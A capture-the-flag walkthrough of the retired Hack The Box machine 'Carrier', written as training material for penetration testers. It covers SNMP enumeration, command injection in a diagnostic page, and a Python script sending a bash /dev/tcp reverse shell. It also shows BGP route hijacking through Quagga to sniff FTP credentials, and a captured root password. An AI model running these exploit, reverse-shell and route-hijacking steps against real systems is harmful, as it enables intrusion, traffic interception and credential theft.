Today we are going to solve another CTF challenge “Carrier”. It is a retired vulnerable lab presented by Hack the Box for helping pentester’s to perform online penetration testing according to your experience level; they have a collection of vulnerable labs as challenges, from beginners to Expert level.
Level: Expert
Task: To find user.txt and root.txt file
Note: The IP of Carrier is 10.10.10.105
root@carrier:/tmp# lxc list +------+---------+---------------------+------+------------+-----------+ | NAME | STATE | IPV4 | IPV6 | TYPE | SNAPSHOTS | +------+---------+---------------------+------+------------+-----------+ | r1 | RUNNING | 10.99.64.2 (eth0) | | PERSISTENT | 0 | | | | 10.78.11.1 (eth2) | | | | | | | 10.78.10.1 (eth1) | | | | +------+---------+---------------------+------+------------+-----------+ | r2 | RUNNING | 10.99.64.3 (eth0) | | PERSISTENT | 0 | | | | 10.78.12.1 (eth2) | | | | | | | 10.78.10.2 (eth1) | | | | +------+---------+---------------------+------+------------+-----------+ | r3 | RUNNING | 10.99.64.4 (eth0) | | PERSISTENT | 0 | | | | 10.78.12.2 (eth2) | | | | | | | 10.78.11.2 (eth1) | | | | | | | 10.120.15.1 (eth3) | | | | +------+---------+---------------------+------+------------+-----------+ | web | RUNNING | 10.99.64.251 (eth0) | | PERSISTENT | 0 | +------+---------+---------------------+------+------------+-----------+ root@carrier:/tmp#
Let’s start off with our basic Nmap command to find out the open ports and services.
c:\PENTEST>nmap -sC -sV -p- -T4 10.10.10.105 Starting Nmap 7.70 ( https://nmap.org ) at 2019-09-09 13:16 W. Europe Summer Time Nmap scan report for 10.10.10.105 Host is up (0.024s latency). Not shown: 65532 closed ports PORT STATE SERVICE VERSION 21/tcp filtered ftp 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 15:a4:28:77:ee:13:07:06:34:09:86:fd:6f:cc:4c:e2 (RSA) | 256 37:be:de:07:0f:10:bb:2b:b5:85:f7:9d:92:5e:83:25 (ECDSA) |_ 256 89:5a:ee:1c:22:02:d2:13:40:f2:45:2e:70:45:b0:c4 (ED25519) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) | http-cookie-flags: | /: | PHPSESSID: |_ httponly flag not set |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Login Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 32.90 seconds
c:\PENTEST>nmap -sU --min-rate=5000 -T4 10.10.10.105 Starting Nmap 7.70 ( https://nmap.org ) at 2019-09-09 13:19 W. Europe Summer Time Nmap scan report for 10.10.10.105 Host is up (0.022s latency). Not shown: 993 open|filtered ports PORT STATE SERVICE 161/udp open snmp 3664/udp closed ups-engine 8900/udp closed jmb-cds1 17423/udp closed unknown 20762/udp closed unknown 44508/udp closed unknown 45380/udp closed unknown Nmap done: 1 IP address (1 host up) scanned in 8.56 seconds
The Nmap scan shows us that there are 3 TCP ports are open: 21(FTP), 22(SSH), 80(HTTP) and 1 UDP port is open: 161(SNMP)
As port 161 is open we use snmpwalk to enumerate SNMP port and find a string called “SN#NET_45JDX23”.
root@kali:~/htb# snmpwalk -c public -v 1 10.10.10.105 Created directory: /var/lib/snmp/mib_indexes iso.3.6.1.2.1.47.1.1.1.1.11 = STRING: "SN#NET_45JDX23" End of MIB
1st we WFUZZ for some more info about the the open port 80,
root@kali:~/htb# wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt --hc 404 http://10.10.10.105/FUZZ ******************************************************** * Wfuzz 2.4 - The Web Fuzzer * ******************************************************** Target: http://10.10.10.105/FUZZ Total requests: 949 =================================================================== ID Response Lines Word Chars Payload =================================================================== 000000223: 301 9 L 28 W 310 Ch "css" 000000245: 301 9 L 28 W 312 Ch "debug" 000000277: 301 9 L 28 W 310 Ch "doc" 000000413: 301 9 L 28 W 310 Ch "img" 000000454: 301 9 L 28 W 309 Ch "js" 000000838: 301 9 L 28 W 312 Ch "tools" Total time: 3.342466 Processed Requests: 949 Filtered Requests: 943 Requests/sec.: 283.9220
We try username “admin” and the string we find earlier as the password. But were unable to login but by using the password “NET_45JDX23”, we were able to login.
By checking the different options in the web application, in the diagnostic tab, we find something interesting. When we click on the “Verify status” button, we find that the server might be running “ps” command.
So further enumerate the web application, we use BurpSuite to capture the request and find inside the “check” parameter a base64 encoded string. When we decode the base64 encoded string we find the string to be called “quagga”. Now if check the web application, it is showing all the process that contains the string “quagga”. So that means the web application is running “ps” with “grep quagga” command.
Now to verify our theory, we change the check parameter to “root” and then encode it to base64 and then encode it to URL encode.
When we send the new request we find that the web application is displaying all the process that contains the string “root”.
Now we check if the web application is vulnerable to command injection or not. We try to run id command on the server.
By changing the parameter to “hack;id” and then encoding it with base64 encode and URL encode we forward the request to the server.
When we check the web application, we find that we are successfully able to run the “id” command that means the web application is vulnerable to command injection.
Now we replace the id command with nc reverse shell one-liner.
We encode the string with base64 encode and URL encode. We setup our listener and then forward the request.
As soon as we forward the request we get a reverse shell, we spawn a TTY shell and check for files in the current directory. Inside we find a file called “user.txt”, we open the file and find the first flag.
C:\Users\jacco>nc -lvp 443 listening on [any] 443 ... 10.10.10.105: inverse host lookup failed: h_errno 11004: NO_DATA connect to [10.10.14.6] from (UNKNOWN) [10.10.10.105] 38314: NO_DATA bash: cannot set terminal process group (2507): Inappropriate ioctl for device bash: no job control in this shell root@r1:~# python3 -c "import pty; pty.spawn('/bin/bash')" python3 -c "import pty; pty.spawn('/bin/bash')" root@r1:~# root@r1:~# ls ls test_intercept.pcap user.txt root@r1:~# cat user.txt cat user.txt 564*****2be
Automated Script to get initial shell:
#!/usr/bin/python """ A script to get a reverse shell on Hack The Box retired machine - Carrier. Write-up : https://0xrick.github.io/hack-the-box/carrier/ usage : ./shell.py [ip adress] [port] """ import requests import sys import subprocess import base64 base_url = "http://10.10.10.105" diag_url = "http://10.10.10.105/diag.php" session = requests.session() login_data = {"username" : "admin" , "password" : "NET_45JDX23"} payload = base64.b64encode("root && bash -i >& /dev/tcp/" + sys.argv[1] + "/" + sys.argv[2] + " 0>&1") shell_data = {"check" : payload} session.post(base_url , data=login_data) subprocess.Popen(["nc","-lvnp",sys.argv[2]]) session.post(diag_url , data=shell_data)
After getting a root shell we enumerated the machine, we do not find anything interesting. Going back to the tickets section on the web page, we find a hint that we need to check another subnet.
We use the ping command to find all the available machines on the subnet “10.120.15.0/24”.
root@r1:~# for i in {1..255}; do ping -c 1 10.120.15.$i | grep "bytes from" | cut -d " " -f4 | cut -d ":" -f1 ; done
<$i | grep "bytes from" | cut -d " " -f4 | cut -d ":" -f1 ; done
10.120.15.1
10.120.15.10
Now we according to the ticket we know there is ftp server running on subnet “10.120.15.0/24”. So we scan both the IP addresses and find port 21 is open on 10.120.15.10. Further enumerating the system in cronjob we find that there is a bash script inside /opt/ directory called “restore.sh”. We take a look at the content of the file and find that the machine is working with Border Gateway Protocol (BGP) with Quagga. Now we can use a technique called BGP hijacking to take over the IP address. The bash script restores the BGP configuration every 10 minutes, so we remove executable permissions from the script so that we can make changes to the configuration of BGP
root@r1:~# crontab -l crontab -l # Edit this file to introduce tasks to be run by cron. # # Each task to run has to be defined through a single line # indicating with different fields when the task will be run # and what command to run for the task # # To define the time you can provide concrete values for # minute (m), hour (h), day of month (dom), month (mon), # and day of week (dow) or use '*' in these fields (for 'any').# # Notice that tasks will be started based on the cron's system # daemon's notion of time and timezones. # # Output of the crontab jobs (including errors) is sent through # email to the user the crontab file belongs to (unless redirected). # # For example, you can run a backup of all your user accounts # at 5 a.m every week with: # 0 5 * * 1 tar -zcf /var/backups/home.tgz /home/ # # For more information see the manual pages of crontab(5) and cron(8) # # m h dom mon dow command */10 * * * * /opt/restore.sh root@r1:~# chmod -x /opt/restore.sh chmod -x /opt/restore.sh
Now we connect to the vty shell and check the current configuration.
root@r1:~# vtysh vtysh Hello, this is Quagga (version 0.99.24.1). Copyright 1996-2005 Kunihiro Ishiguro, et al. r1# show running-config show running-config Building configuration... Current configuration: ! ! interface eth0 ipv6 nd suppress-ra no link-detect ! interface eth1 ipv6 nd suppress-ra no link-detect ! interface eth2 ipv6 nd suppress-ra no link-detect ! interface lo no link-detect ! router bgp 100 bgp router-id 10.255.255.1 network 10.101.8.0/21 network 10.101.16.0/21 redistribute connected neighbor 10.78.10.2 remote-as 200 neighbor 10.78.10.2 route-map to-as200 out neighbor 10.78.11.2 remote-as 300 neighbor 10.78.11.2 route-map to-as300 out ! route-map to-as200 permit 10 ! route-map to-as300 permit 10 ! ip forwarding ! line vty ! end r1#
Now switch to configure mode, and to intercept the traffic we want 10.120.15.0/25 to use our machine as the gateway.
r1# configure terminal configure terminal r1(config)# ip prefix-list 0xdf permit 10.120.15.0/25 ip prefix-list 0xdf permit 10.120.15.0/25 r1(config)# route-map to-as200 permit 10 route-map to-as200 permit 10 r1(config-route-map)# match ip address prefix-list 0xdf match ip address prefix-list 0xdf r1(config-route-map)# set community no-export set community no-export r1(config-route-map)# route-map to-as200 permit 20 route-map to-as200 permit 20 r1(config-route-map)# route-map to-as300 deny 10 route-map to-as300 deny 10 r1(config-route-map)# match ip address prefix-list 0xdf match ip address prefix-list 0xdf r1(config-route-map)# route-map to-as300 permit 20 route-map to-as300 permit 20 r1(config-route-map)# router bgp 100 router bgp 100 r1(config-router)# network 10.120.15.0 mask 255.255.255.128 network 10.120.15.0 mask 255.255.255.128 r1(config-router)# end end r1# clear ip bgp * clear ip bgp * r1#
r1# show ip bgp neighbors 10.78.10.2 advertised-routes show ip bgp neighbors 10.78.10.2 advertised-routes BGP table version is 0, local router ID is 10.255.255.1 Status codes: s suppressed, d damped, h history, * valid, > best, = multipath, i internal, r RIB-failure, S Stale, R Removed Origin codes: i - IGP, e - EGP, ? - incomplete Network Next Hop Metric LocPrf Weight Path *> 10.78.10.0/24 10.78.10.1 0 32768 ? *> 10.78.11.0/24 10.78.10.1 0 32768 ? *> 10.99.64.0/24 10.78.10.1 0 32768 ? *> 10.101.8.0/21 10.78.10.1 0 32768 i *> 10.101.16.0/21 10.78.10.1 0 32768 i *> 10.120.10.0/24 10.78.10.1 0 300 i *> 10.120.11.0/24 10.78.10.1 0 300 i *> 10.120.12.0/24 10.78.10.1 0 300 i *> 10.120.13.0/24 10.78.10.1 0 300 i *> 10.120.14.0/24 10.78.10.1 0 300 i *> 10.120.15.0/24 10.78.10.1 0 300 i *> 10.120.15.0/25 10.78.10.1 0 32768 i *> 10.120.16.0/24 10.78.10.1 0 300 i *> 10.120.17.0/24 10.78.10.1 0 300 i *> 10.120.18.0/24 10.78.10.1 0 300 i *> 10.120.19.0/24 10.78.10.1 0 300 i *> 10.120.20.0/24 10.78.10.1 0 300 i Total number of prefixes 17 r1#
Now we will start collecting packets on port 21 using tcpdump, we will be using the interface eth2.
root@r1:~# tcpdump -i eth2 -nnXSs 0 'port 21' -w hack.pcap tcpdump -i eth2 -nnXSs 0 'port 21' -w hack.pcap tcpdump: listening on eth2, link-type EN10MB (Ethernet), capture size 262144 bytes ^C root@kali:~/htb# nc -lvp 443 listening on [any] 443 ... 10.10.10.105: inverse host lookup failed: Unknown host connect to [10.10.14.6] from (UNKNOWN) [10.10.10.105] 43170 bash: cannot set terminal process group (14215): Inappropriate ioctl for device bash: no job control in this shell root@r1:~# ls ls hack.pcap test_intercept.pcap user.txt
We wait for some time then interrupt the capture and check if the pcap file has been created. Now we transfer the file to our system with netcat and analyze it with Wireshark and find the password for FTP.
We use this password to login through SSH on the target system and are successfully able to login. After logging in, we find a file called root.txt, we take a look at the content of the file and find the final flag.
C:\Users\jacco>ssh root@10.10.10.105 root@10.10.10.105's password:BGPtelc0rout1ng Welcome to Ubuntu 18.04 LTS (GNU/Linux 4.15.0-24-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantageWelcome to Ubuntu 18.04 LTS (GNU/Linux 4.15.0-24-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage System information as of Mon Sep 9 11:26:48 UTC 2019 System load: 0.03 Users logged in: 0 Usage of /: 40.8% of 19.56GB IP address for ens33: 10.10.10.105 Memory usage: 35% IP address for lxdbr0: 10.99.64.1 Swap usage: 0% IP address for lxdbr1: 10.120.15.10 => There were exceptions while processing one or more plugins. See /var/log/landscape/sysinfo.log for more information. * Canonical Livepatch is available for installation. - Reduce system reboots and improve kernel security. Activate at: https://ubuntu.com/livepatch 4 packages can be updated. 0 updates are security updates. Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings Last login: Mon Sep 9 10:10:25 2019 from 10.10.14.6 root@carrier:~# pwd /root root@carrier:~# ls root.txt secretdata.txt root@carrier:~# cat root.txt 283*****866
credits to: https://www.hackingarticles.in/hack-the-box-carrier-walkthrough/
Author: Jacco Straathof